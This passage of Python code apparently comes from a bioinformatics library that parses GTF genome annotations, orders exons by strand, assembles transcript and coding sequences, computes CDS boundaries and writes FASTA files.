        CDS will start and end at CDS boundaries, but excludes the stop codon, so pass ['CDS', 'stop_codon'] to get the full coding sequence.
        - Be careful not to mix annotation types that may overlap (for example exon with any other), as you will get the wrong sequence, with duplicates.
Returns exons in annotated order, based on start position of each exon
Ordering is relative to the sense strand, so the first exon in the list will be the 5'-most exon in the transcript.
However, the "end" of the exon boundary is always larger than the 'start'
"""
transcript_entries = self.transcript_to_entries[transcript_id]
ordered_exon_entries = [entry for entry in transcript_entries if entry.is_type(exon_type)]
ordered_exon_entries.sort(key=lambda x: int(x.get_value('start')))
# if this transcript is on the minus strand, the exon order needs to be flipped
if len(ordered_exon_entries)>0:
if ordered_exon_entries[0].get_value('strand') == '+':
ordered_exon_entries.sort(key=lambda x: int(x.get_value('start')))
else:
ordered_exon_entries.sort(key=lambda x: int(x.get_value('start')), reverse=True)
return ordered_exon_entries
def transcript_sequence(self, genome_sequence, transcript_id, exon_type='exon'):
"""
exon_type can be CDS or exon.
CDS will start and end at CDS boundaries, so that's convenient
Returns sequence of transcript or cds
"""
ordered_exon_entries = self.sorted_exons(transcript_id, exon_type=exon_type)
transcript_sequence = ''.join([exon_entry.sequence(genome_sequence) for exon_entry in ordered_exon_entries])
return transcript_sequence
def exon_boundaries(self, transcript_id):
"""
:param transcript_id:
:param exon_type:
:return: list of exon start and end positions, relative to the sense transcript orientation.
Transcription start site is zero
"""
sorted_exons = self.sorted_exons(transcript_id, exon_type='exon')
starts = []
ends = []
for exon_index in range(len(sorted_exons)):
if exon_index == 0:
starts.append(0)
else:
starts.append(ends[exon_index-1]+1)
ends.append(starts[exon_index]+sorted_exons[exon_index].length()-1)
return starts, ends
def cds_boundaries(self, transcript_id):
"""
:param transcript_id:
:param exon_type:
:return: CDS start and end, relative to the sense transcript orientation.
Transcription start site is zero
"""
sorted_tx_exons = self.sorted_exons(transcript_id, exon_type=['exon'])
if self.add_3_for_stop:
sorted_CDS_exons = self.sorted_exons(transcript_id, exon_type=['CDS', 'stop_codon'])
CDS_length = self.spliced_length(transcript_id, exon_type=['CDS', 'stop_codon'])
else:
sorted_CDS_exons = self.sorted_exons(transcript_id, exon_type=['CDS'])
CDS_length = self.spliced_length(transcript_id, exon_type=['CDS'])
if len(sorted_CDS_exons) == 0:
return None, None
strand = sorted_CDS_exons[0].get_value('strand')
assert strand in ['+','-']
if strand == '+':
genomic_CDS_start = int(sorted_CDS_exons[0].get_value('start'))
#genomic_CDS_end = int(sorted_CDS_exons[-1].get_value('end'))
# now, the hard part is finding the start codon
transcript_leader_length = 0
for exon in sorted_tx_exons:
if int(exon.get_value('end')) < genomic_CDS_start:
transcript_leader_length += exon.length()
elif int(exon.get_value('start')) <= genomic_CDS_start and int(exon.get_value('end')) > genomic_CDS_start:
transcript_leader_length += genomic_CDS_start-int(exon.get_value('start'))
break
start = transcript_leader_length
end = transcript_leader_length + CDS_length-1
else:
genomic_CDS_start = int(sorted_CDS_exons[0].get_value('end'))
transcript_leader_length = 0
for exon in sorted_tx_exons:
if int(exon.get_value('start')) > genomic_CDS_start:
transcript_leader_length += exon.length()
elif int(exon.get_value('end')) >= genomic_CDS_start and int(exon.get_value('start')) < genomic_CDS_start:
transcript_leader_length += int(exon.get_value('end'))-genomic_CDS_start
break
start = transcript_leader_length
end = transcript_leader_length + CDS_length-1
return start, end
def write_transcript_sequences_to_FASTA(self, out_file, genome_sequence, transcript_ids=None, exon_type='exon'):
if transcript_ids == None:
transcript_ids = self.transcript_to_entries.keys()
if out_file.endswith('.gz'):
out_fasta = gzip.open(out_file, 'w')
else:
out_fasta = open(out_file, 'w')
for transcript_id in transcript_ids:
out_fasta.write('>%s_%s\n' % (transcript_id, sorted(self.transcript_to_entries[transcript_id])[0].get_value('gene_name')))
out_fasta.write('%s\n' % self.transcript_sequence(genome_sequence, transcript_id, exon_type=exon_type))
out_fasta.close()
class gtf_entry():
def __init__(self, gtf_file_line, parent_gtf):
#self.gtf_file_line = gtf_file_line
ll = gtf_file_line.rstrip('\n').split('\t')
self.primary_data = dict(zip(parent_gtf.fields, ll))
if 'additional' in self.primary_data:
additional_pairs = self.primary_data['additional'].split('; ')
self.secondary_data = dict([pair.split(' ') for pair in additional_pairs if pair != ''])
for key in self.secondary_data:
self.secondary_data[key] = self.secondary_data[key].strip(';').strip('"')
def __repr__(self):
return '%s %s %s %s %s %s' % (self.get_value('transcript_id'), self.get_value('type'), self.get_value('chr'), self.get_value('strand'),
self.get_value('start'), self.get_value('end'))
def is_type(self, entry_type):
"""
Check if this entry is of the given primary type (third column of gtf file), or in the given list of types
"""
if isinstance(entry_type, str):
return self.primary_data['type'] == entry_type
elif isinstance(entry_type, list):
return self.primary_data['type'] in entry_type
else:
            raise Exception("entry_type should be a string or list of strings, received type %s" % type(entry_type))
def get_value(self, key):
assert not (key in self.primary_data and key in self.secondary_data)
if key in self.primary_data:
return self.primary_data[key]
elif key in self.secondary_data:
return self.secondary_data[key]
else:
return None
def length(self):
return (int(self.get_value('end')) - int(self.get_value('start'))) + 1
def sequence(self, genome_sequence):
"""
return the sense strand sequence of this element
This accounts for the strand information, so minus strand elements will be reverse complemented
"""
return genome_sequence.get_sequence(self.get_value('chr'), int(self.get_value('start')),
int(self.get_value('end')), self.get_value('strand'))
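# Hedged end-to-end sketch (assumption; the file names are placeholders): load a
# genome FASTA and a GTF, pick one longest-CDS transcript per gene, and write the
# spliced coding sequences to a FASTA file.
def _gtf_pipeline_example():
    genome = genome_sequence('genome.fa')
    annotations = gtf_data('annotations.gtf.gz', add_3_for_stop=True)
    chosen = annotations.pick_all_longest_CDS_transcripts()
    annotations.write_transcript_sequences_to_FASTA(
        'longest_cds.fa', genome, transcript_ids=chosen,
        exon_type=['CDS', 'stop_codon'])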
|